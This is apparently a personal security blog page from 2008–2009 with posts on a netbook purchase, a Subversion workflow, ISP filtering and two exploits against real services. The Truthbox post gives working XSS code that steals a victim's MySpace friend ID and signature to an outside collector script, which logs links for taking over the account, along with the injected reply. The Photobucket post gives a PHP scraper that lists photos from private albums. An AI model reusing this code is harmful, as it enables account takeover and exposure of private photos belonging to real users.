Joey Adams Dot Net

Southern Fried Programming

Enrolled in Offensive-Security 101

January 2nd, 2009 by Joey in Uncategorized | No Comments →

I just enrolled in the Offensive-Security 101 course from the creators of Backtrack. The scope of the course is huge. They cover everything from learning about your tools in depth, network enumeration, all the way to vulnerability discovery, exploit development, and documentation.

The course gives you online videos, written documentation, along with access to a special lab where you can try out challenges in each section on live machines. Not for the faint hearted, the certification exam at the end gives you 24 hours in a completely live unfamiliar network, in which you are to complete a number of challenges they give you. I have talked to a few people who have completed the exam, and they said they finished in around 8 hours.

This is very demanding course and exam, the exam seems to be relative to the RHCE and CCIE exams, as they take place in a live environment, and you have to prove your abilities instead of show your skill at memorization.

I am extremely anxious to start the course material, and will have a beter review once I complete the course.

Asus EEE 1000HA on its’ way!

December 27th, 2008 by Joey in Uncategorized | No Comments →

With Christmas being tomorrow, I tried to sort out what I really could use. After all, this is the biggest excuse to buy something for yourself without looking wasteful. I honestly could not come up with anything that I really needed that would satisfy my technolust.

If you don’t know, I own a HP DV8000 laptop, it has a 1.8Ghz Turion64, 1.4gb ram, a massive 17″ display  and some wifi goodies for pentesting. The problem is, after an unfortunate run-in with airport security, the LCD has been washing out and you have to get it tilted in the ’sweet’ spot just to use the computer, if not the screen remains frozen.

While it ‘IS’ a laptop, the massive amount of real-estate and the issues with the display do not make it very worthy for mobile computing. If I were to whip it out at a coffee shop or somewhere, it would just dominate whatever table or lap it is sitting on, leaving no room for coffee :( . It also is a pain when troubleshooting friends computers or just carrying it while trying to operate it at the same time.

So I decided to get one of these sweet little EEE netbooks that I hear about all the time. I really like how small they are, in a nostalgic “Hackers” movie kind of way. I settled on the 1000HA. If you don’t know the ‘H’ stands for harddrive, as in a magnetic 160GB drive as opposed to the ~20gb solid state ones in other models. I really like my drive capacity, even though the newer SSD’s are very worth it. The ‘A’ stands for ‘Atom’ , as in the new Intel Atom processor. The Atom is a very tiny 45nm, with a powerful 1.6ghz operating power. The 1000HA also sports a 10″ display.

After the order, which was extremely cheap thanks to Amazon.com , along with the 2gb ram upgrade, I almost regretted ordering it, because of my want for a compact netbook, the pictures I found made this look very similiar to shorter 15″ notebooks. There is a very minute amount of photos on this model, and it is very difficult to imaging it in your hands. After watching a few youtube videos of others installing ram modules, and unboxing the 1000HA , I am pretty sure that I will be keeping it.

I am still unsure on what I want to use with it, I want to dualboot with Backtrack3, and then change up to 4 whenever it comes out, but as my primary OS on the computer, I have no idea what I want. I really would like Debian, but the DebianEEE group has no news of tests on the 1000HA, same being with the EEEbuntu group, and I really don’t want fedora. I may just keep the stock XP, tune it, and install some emulators and such and play a little FF7 on the go.

Once I get it, I’ll install the 2gb upgrade, and run BT3 off an SD card and do some tests.  If  it runs fast enough, then I won’t dual boot, as BT4 is soon to come.

Well whatever, this is an attempt at an article, I will do more in depth on Tuesday when it arrives.

What REALLY happens when you view a webpage

October 21st, 2008 by Joey in Electronics, Uncategorized | 3 Comments →

This post is something I thought of while listening to people talk and gripe about how long it takes to view websites and to surf the internet. The majority of people do not understand the inner working of computer systems at very low levels, even I have a threshold of knowledge that I have to stop at, but I think it would be an interesting read for someone who wants to know what exactly happens when they hit ‘GO’ in there favorite browser (hopefully Firefox ;) ).

INTRO:

To start things off, lets talk about what the internet consists of. Most everyone knows what a Browser is, they have heard of “Servers” before, and have seen a Modem or Router. Well these objects provide the basis for connectivity, after all , the internet is nothing more than a great big network of computers. Read the rest of this entry »

Hacking Myspace’s Truthbox

October 15th, 2008 by Joey in Uncategorized | No Comments →

I developed exploit code for Truthbox months ago, and am now releasing a writeup.

Myspace applications are stand-alone web applications hosted on arbitrary servers that use Myspace’s API to communicate user information between its own programming logic. The details of authorization and authentication of using the api I have not explored, but I imagine it is similiar to PayPal’s API with a series of requests and responses using trasactional id’s and pre-shared authentication keys. Hopefully also using referrer information to determine if the packets were sent from a legit source. Even with these securities, these mechanisms are always flawed.

Back to the subject, I first discovered that you can enter scripting in almost any form into truthbox replies. Now you cannot do this with the initial comment itself, but with replies you can enter markup and script without being filtered, in other words, XSS (cross-site scripting).

The next part was finding an association on the client side with your myspace identity. As it turns out, and in particular being part of an even bigger hole, your friend id is stored in links all over the place inside a GET variable called ‘fb_sig_user’. More on why later.

So we create a script that will parse the page and pick out this friend ID from the links on the page. Not all links on the page contain this variable, so you have to make your script work a little bit harder. After we extract the friend ID , we can store it and view it later, plugging it into a myspace url, giving you the identity of whoever left you a comment. 1 Problem, replies are limited on characters, but all you have to do is store your script somewhere on the web, and in your reply, call an external script.

Now why does it store your friend id, anyway? Well, for identification. Since you are not operating on myspace’s servers, yet in an iframe pointing to a arbitrary script, it is exactly like visiting an entirely different website. The seamless communication happens on the backend between myspace and this app-server. So supplying your friend ID in the URL of web requests, you are telling ‘TruthBox’ who you are. So what if we change our friend id to someone elses?

Well, as I found out by plugging in variable by variable, there is a check that truthbox does to make sure you are ‘you’. There is a value, or a signature, associated with your truthbox account. If you have their friend ID, and their signature, you simply plug these into the URL and you can take control of their Truthbox account. Luckily, the signature is also stored in client side URL values as ‘fb_sig’. So we mess with our script to pull this value out along with the friend ID and we should be good to go.

Here is, in lamens, how it works.

Someone leaves you a nasty, or exciting :) comment. You reply to their comment with an external script. In my script, I added a function to include a comment to seperate different truth box comments from each other. Whenever they view your reply, the script runs and extracts their friend ID and truthbox signature, and stores this to view later, along with the comment in my script.

You view the results, and can click a link to view their myspace profile. Another link, when clicked, allows you to take control and look through their truthbox profile, seeing who all they have commented, and who has commented them.

This was simple fun to mess with the unknown, and nothing more, with this research, I more than satisfied what I wanted to accompolish, and beyond the 2 days I was messing with it, I have not looked at the source in truthbox pages since.

Below is some of my source code of the scripts I used.

The external script. (a.js)

function strpos( haystack, needle, offset){
    var i = (haystack+'').indexOf( needle, offset );
    return i===-1 ? false : i;
}
function gets( str){
        var f = strpos(str,'fb_sig%3D') + 9;
        return str.substr(f);
}
function getf( str){
        var f = strpos(str,'fb_sig_user') + 14;
        var s = strpos(str,'%26',f);
        var l = s - f;
        return str.substr(f,l);
}
function a(comment){
var i = 0;
var f = 0;
while(f != 1){
        if (document.links[i].href.search('fb_sig_user') > 0){
window.location = "http://xxxx/cook.php?c=" + comment + "&u=" + getf(document.links[i].href) + "&s=" + gets(document.links[i].href);
                f = 1;
        } else {
                i++;
        }
}
}

cook.php

<?php

@$u = $_GET['u'];
@$s = $_GET['s'];

$dir = 'results';

$h = fopen("./{$dir}/results.html",'a+');
$text = '';
if(isset($_GET['c'])){
        $text .= "Comment= {$_GET['c']} - ";
}
if(isset($_GET['s'])){
        $text .= "<a href='http://opensocial.rockyou.com/google_apps/truthbox/truthbox/html/index.php?target=home&fb_sig_user={$u}&fb_sig_network=myspace&fb_sig={$s}'>See Their Truths</a> -";

}
$text .= "Profile: <a href='http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={$u}'>View Profile</a><hr/>";
fwrite($h,$text);
fclose($h);

?>

The reply used to trigger the attack.

<script type='text/javascript' src='http://xxxx/a.js'></script>
<script>a('Comment Here');</script>

Lack of.. Posting

October 10th, 2008 by Joey in Uncategorized | No Comments →

I have not posted in a good while because I have been too busy with things. With the economic meltdown, my day job is now doubled. I work at a local FOX affiliate, but I also contract IT work for them as well. Do to the current hiring freeze I can’t be promoted (not sure I would be in the first place), and to top all that off I also work with Heritage Web Solutions as an outsourced dev.

Between it all I make some good money but do not get a lot of free time, and the time I get is consumed with my son and my many hobbies.

What I want to accompolish before the new year is the Zend Framework Cert, and then complete the MYSQL exam in the first quarter of next year. That should satisfy myself for now.

There have been a great deal of happenings in the security world, the newest being the ever elusive clickjacking. I’ve been keeping up with it by constanting RSnake’s blog over at http://ha.ckers.org  .  If you have not heard of it, then you MUST visit his blog to read more, I won’t even disrespect the subject by regurgitating what he said, you must read it for yourself.

SupermanDatHo ? Soulja Boy got hacked

August 28th, 2008 by Joey in Uncategorized | 1 Comment →

Yes… That was his pw.

I’m not blogging on this much because all it was is someone guessing his password, which is quite hilarious though.

Anyway.. at the end of the video he posted, he calls out hackers, wanting to make an example of this one.. lets just say it is not wise

to mess with people who can take your life away in this digital age, just tell him to ask the owner of LifeLock how that works out for you.

Subversive Development for the Serious Web Professional

July 26th, 2008 by Joey in Uncategorized | No Comments →

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however going to explain how I am implementing Subversion into my current development environment.

First, my reasons for using version control

  • No SPOF(Single point of failure) -  My flow always has 3 concurrent copies of the source at any given point, so if one machine fails fatily, my project data is still safe.
  • Repository - Having a repository means I can revert to older versions if needed, as well as keep up with changes made each step along the way.
  • No direct Editing- I never have to touch staging or live servers, I only modify the development copy, so that human error is reduced ten-fold.

Here is how it all works.

I have 3 machines ,   dev/repo/serv  , where dev is my development workstation, repo is the machine hosting the subversion repository, and serv is my http server.

On the http server, in my projects directory, there is a folder for each project I am working on. In the individual project folder, there are 3 other folders, dev/staging/live.

Using Virtual Hosts on httpserv, I make the development folder only accesible by my local network, the staging folder is available by password protection, and the live server is publicly available.

 I use Zend Studio For Eclipse with  a Subversion/PHP Project and use WebDrive to securely map the projects dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of project files) on the dev folder on my http server.

I edit files from my workstation, and view the changes on the development vhost. Once I finish adding a module/functionality/milestone on the project and want the clients’ approval, I use a script called  svn_sync.sh located in each projects main directory.

Svn_sync.sh, first makes sure you have committed changes to the trunk aka dev folder, after that you specify what source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch, and update the working copy inside the staging folder. I now can show the client the changes.

Once I have his approval, I run svn_sync.sh again, and have it merge the staging branch into the live branch, and then update the live directory aka The live server.

That is my SDLC (Software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for, High Availability, Reliable, Robust, scalable, and professional.

Sure direct editing and copy -r  work, and I maybe overdoing it as a single developer, but I am very happy with my results and would recommend anyone wanting the experience to do the same.

Web Application Security Survey

July 21st, 2008 by Joey in Uncategorized | No Comments →

It is unarguable that Jeremiah Grossman is a pretty big name in Web Application Security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansens’ posts. They tend to have a lot of great info, and a lot of fun things to be a part of.

 Jeremiah has his W.A.S. Survey up for anyone that works around the field to take. Some of the questions are really inquisitive.

 Anyway, if you work around the field, you should take the survey. Head on over to his site to take the survey.

View private Photobucket accounts via Mobile-Web

July 18th, 2008 by Joey in Uncategorized | 4 Comments →

Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend Jessie McKnight. The catch to it, was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links take a lot of time.

I hacked up a working script in about an hour, that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsuled in an image tag to a html file using the original photobucket url (not the mobile domain), then it repeats this process on the url obtained by the prev anchor.

This was a very intensive process so I capped it at 50 requests, and storing the pictures on a seperate page allowed for quicker retrievals while the script was crawling, also for saving results from different people using the script at the same time.

This is in no way an optimized script, this was thrown together from scrap to completion in under an hour, but is just a P.O.C

<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>

<?php

if(isset($_GET['album'])){
$fh = fopen('photos.html','a');
$get_album = $_GET['album'];
$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
$albumurl = substr($get_album,0,strrpos($get_album,'/'));
$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
$i=0;
while($i <= 100){
	$url = getPrevUrl($url);
	$im = getImage($url,$albumurl);
	fwrite($fh,$im);
	echo $im;
	$i++;
}
fclose($fh);
}

function getPrevUrl($url){
  $input = @file_get_contents($url) or die('Could not access file: $url');
  $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
  if(preg_match_all("/$regexp/siU", $input, $matches)) {
	$photoUrl = "http://m55.photobucket.com" . $matches[2][4];
	return $photoUrl;
	}else{
		return $url;
	}
}

function getImage($url,$alburl){
	$photoUrl = substr($url,0,strrpos($url,"."));
	$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
	$photoUrl = $alburl . $photoUrl;
	return "<img src='$photoUrl'/><br/>";
}

Major ISP’s agree on child pornography filtering.

July 18th, 2008 by Joey in Uncategorized | No Comments →

I have not went into detail about this agreement, but you can be certain, whenever ISP’s ban together to prevent something, it hurts the consumer.

Filtering slows down speeds (minutely), but the real flaw in filtering is the use of a non-certain list. Whitelist or Blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.

 I am definately against child pornography, however, false positives from filtering, and the way some ISPs like to communicate with law enforcement could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with web hosting companies that are hosting accounts with this type of content on it. Filtering is not mature enough yet.

 For instance, AT&T customers, this blog post even, might be filtered away in the given year. Just for it’s title.

 Filtering, throttling, anything other than providing direct internet connectivity is a horrible breach of trust and net neutrality, boo!

← Previous Entries